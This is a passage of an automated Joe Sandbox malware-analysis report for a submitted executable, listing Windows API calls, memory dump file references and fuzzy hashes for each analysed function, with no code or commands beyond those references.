                                                                                                            • String ID:
                                                                                                            • API String ID: 2018770650-0
                                                                                                            • Opcode ID: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
                                                                                                            • Instruction ID: 56c29436b3704a60aac7ef2d45938277689dd37fb147f6dcc6f0601c7006ef02
                                                                                                            • Opcode Fuzzy Hash: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
                                                                                                            • Instruction Fuzzy Hash: 59F0C872A04644ABCB00DF75AC416AEB7E8DB4831575149B7FC04E3262E7385E189598
                                                                                                            APIs
                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452179
                                                                                                            • GetLastError.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452181
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesErrorFileLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 1799206407-0
                                                                                                            • Opcode ID: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                                                            • Instruction ID: 62be775e20b856c612f09eeab74c149225b5b58071cf0ad503393caa7686f059
                                                                                                            • Opcode Fuzzy Hash: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                                                            • Instruction Fuzzy Hash: 2BF02870A04B08ABDB10DF759C414AEB3E8EB4572571047B7FC14A3282D7785E088588
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045CEF2), ref: 0045D046
                                                                                                            Strings
                                                                                                            • bzlib: Too much memory requested, xrefs: 0045D021
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AllocVirtual
                                                                                                            • String ID: bzlib: Too much memory requested
                                                                                                            • API String ID: 4275171209-1500031545
                                                                                                            • Opcode ID: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                                                            • Instruction ID: abed268314e6f1e5b27342288b91a972118d83a3dc427804377a042ebfa3a805
                                                                                                            • Opcode Fuzzy Hash: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                                                            • Instruction Fuzzy Hash: 87F030327001114BDB6199A988C17DA66D48F8875EF080476AF4CDF28BD6BDDC89C36C
                                                                                                            APIs
                                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                                                            • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CursorLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 3238433803-0
                                                                                                            • Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                                                            • Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
                                                                                                            • Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                                                            • Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                                            • String ID:
                                                                                                            • API String ID: 2987862817-0
                                                                                                            • Opcode ID: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                                                            • Instruction ID: 1f7e49cd896e1bdba9cb1c47732ae581670473b421036b970d27c02fb23a5fd1
                                                                                                            • Opcode Fuzzy Hash: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                                                            • Instruction Fuzzy Hash: ACF05E70614744BEDB029F679C6282ABAECE74DB1179248BAF800A7691E63D58108928
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF6E
                                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF76
                                                                                                              • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156039329-0
                                                                                                            • Opcode ID: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                                                            • Instruction ID: 1dbdaa83cb3dbbf4f1378df278a55a8d47ec78cb15146b3f417e0b56a3c3e3df
                                                                                                            • Opcode Fuzzy Hash: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                                                            • Instruction Fuzzy Hash: E2E012B13056015BFB00EAA599C1F3B22D8DB49314F10487BB544CF182E674CC098B65
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$AllocLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 15508794-0
                                                                                                            • Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                                                            • Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
                                                                                                            • Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                                                            • Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C
                                                                                                            APIs
                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Virtual$AllocFree
                                                                                                            • String ID:
                                                                                                            • API String ID: 2087232378-0
                                                                                                            • Opcode ID: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                                                            • Instruction ID: b33c25bc9d44e5855224c25112d8485d4e2e4d0ac397fdc44bd3a0d1e7be2c31
                                                                                                            • Opcode Fuzzy Hash: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                                                            • Instruction Fuzzy Hash: 3BF08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9
                                                                                                            APIs
                                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                                                              • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                                                                              • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1658689577-0
                                                                                                            • Opcode ID: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                                                            • Instruction ID: 93f846491c188cfa0342f854d2ed9f3c57c1d7a82097d89a8732084db8b3b420
                                                                                                            • Opcode Fuzzy Hash: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
                                                                                                            • Instruction Fuzzy Hash: 11314375E001199BCF00DF95C8819DEB7B9FF84314F15857BE815AB286E738AE058B98
                                                                                                            APIs
                                                                                                            • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoScroll
                                                                                                            • String ID:
                                                                                                            • API String ID: 629608716-0
                                                                                                            • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                                            • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                                                                            • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                                                            • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                                                            APIs
                                                                                                              • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                                                              • Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09
                                                                                                            • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B526,?,00000000,?,?,0046B733,?,00000000,0046B772), ref: 0046B50A
                                                                                                              • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                                                              • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 390483697-0
                                                                                                            • Opcode ID: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                                                            • Instruction ID: 01ed1b7c575f4ace7d1103a0bc1ae6f252d8ead66db9bed0bf215ba1be387fc5
                                                                                                            • Opcode Fuzzy Hash: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                                                            • Instruction Fuzzy Hash: 09F059B0244300BFE7109B32FC16B6677E8D709708F90443BF400C25C0E3794880C9AE
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3934441357-0
                                                                                                            • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                            • Instruction ID: 028ceee379c3c7d470caefb370f3d10d378470f307764de9520dc446ef7e13f5
                                                                                                            • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                                            • Instruction Fuzzy Hash: 1AF06D3090410AEFEB1CCF58D0A58BFB7A1EB48300B20856FE607C7790D638AE60DB58
                                                                                                            APIs
                                                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                                                            • Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
                                                                                                            • Opcode Fuzzy Hash: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                                                            • Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1
                                                                                                            APIs
                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 2492992576-0
                                                                                                            • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                            • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                                            • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                                            • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                                            APIs
                                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0042CCE0,?,00000001,?,?,00000000,?,0042CD32,00000000,00452085,00000000,004520A6,?,00000000), ref: 0042CCC3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                                                            • Instruction ID: 1943a86784c022a2dfd859aef87f3de3c0de5fcd5c78e915f44ffa8231ae9d07
                                                                                                            • Opcode Fuzzy Hash: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                                                            • Instruction Fuzzy Hash: B0E06571304704BFD711EB629C93A5EBBACD745714B914476F500D7541D578AE009558
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                                                            • Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
                                                                                                            • Opcode Fuzzy Hash: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                                                            • Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9
                                                                                                            APIs
                                                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FormatMessage
                                                                                                            • String ID:
                                                                                                            • API String ID: 1306739567-0
                                                                                                            • Opcode ID: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                                                            • Instruction ID: 307a162b73ad64172b1e6f06154ade3ab8019b251ee6aa90c4987cddc8a641e5
                                                                                                            • Opcode Fuzzy Hash: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                                                            • Instruction Fuzzy Hash: 80E0206178431165F23529156C83F7B120E83C0B08F9480267B50DD3D3DAAE9D09425E
                                                                                                            APIs
                                                                                                            • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                            • Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd
